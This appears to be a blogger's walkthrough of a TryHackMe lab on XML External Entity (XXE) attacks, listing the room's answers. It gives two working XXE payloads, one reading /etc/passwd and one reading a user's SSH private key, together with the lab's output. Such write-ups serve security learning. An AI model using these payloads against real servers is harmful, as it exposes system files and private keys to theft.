TryHackMe: OWASP Top 10 || Severity 4 || XML External Entity (XXE)

eXtensible Markup Language
No
Yes
XML prolog
!ELEMENT
!DOCTYPE
!ENTITY
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>
falcon:x:1000:1000:falcon,,,:/home/falcon:/bin/bash
id_rsa is the default location where a ssh key is located. /home/falcon/.ssh/id_rsa
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:/home/falcon/.ssh/id_rsa'>]>
<root>&read;</root>
-----BEGIN RSA PRIVATE KEY----- MIIEogIBAAKCAQEA7b -----END RSA PRIVATE KEY-----

--

--

--

A food lover, a cyber security enthusiast, a musician and a traveller, so you will see a mix of different contents in my blog. ☺️

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

How to validate a Phone Number in Node.JS

READ/DOWNLOAD*# Learning React: Functional Web Dev

What is difference between NSArray and Array ?

JavaScript String (Part-1)

Create an API in Node, Express & MongoDB part-2

Authentication and authorization boilerplate with Apollo 2.0 | Part 3

Walt https://t.co/gb9MXbPXy4 https://t.co/KbW0hUmfHP

An introduction to DOM

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
goay xuan hui

goay xuan hui

A food lover, a cyber security enthusiast, a musician and a traveller, so you will see a mix of different contents in my blog. ☺️

More from Medium

API Pentesting using Postman and OWASP ZAP

SQL Injection Attacks

Logfile Vulnerability Log4Shell for RCE

Cross-Compiling and Debugging C++ program on MaaxBoard-Avnet using Eclipse